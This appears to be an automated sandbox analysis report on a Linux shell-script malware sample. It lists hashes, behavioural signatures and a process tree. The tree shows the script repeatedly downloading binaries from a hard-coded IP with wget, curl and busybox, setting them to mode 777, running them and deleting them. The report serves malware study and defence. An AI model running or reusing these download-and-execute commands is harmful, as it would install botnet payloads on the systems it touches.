Analysis
-
max time kernel
75s -
max time network
77s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/10/2024, 01:21
Static task
static1
Behavioral task
behavioral1
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
-
Size
10KB
-
MD5
8695c3f5bc9a782d939a590ce31f75f3
-
SHA1
914e569c0a6610aac0f3009b5b8970f722aab8df
-
SHA256
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e
-
SHA512
ca0e16c73a69de5d269bec40b6c389461cb0930553830b76e87bcd98c43bcc506fc81cdfedd919445aed23d40b6c0b45cc902815318deb69fa37f0909fd77b3b
-
SSDEEP
192:5P8Pu15ABxEJ3AUJMkxiq6tiZEuy15ABxGAUJMkxeq6tiZEL:5P8Pu15ABxEJ3AUJMkxnTy15ABxGAUJe
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:731
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:740
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:746
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:754
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:802
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:807
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:809
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:829
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:854
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:860
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:866
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:872
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:878
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:884
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:890
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:896
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:902
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:908
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:914
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:920
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:926
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:932
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:938
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:944
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:950
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:956
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:962
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:968
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:974
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97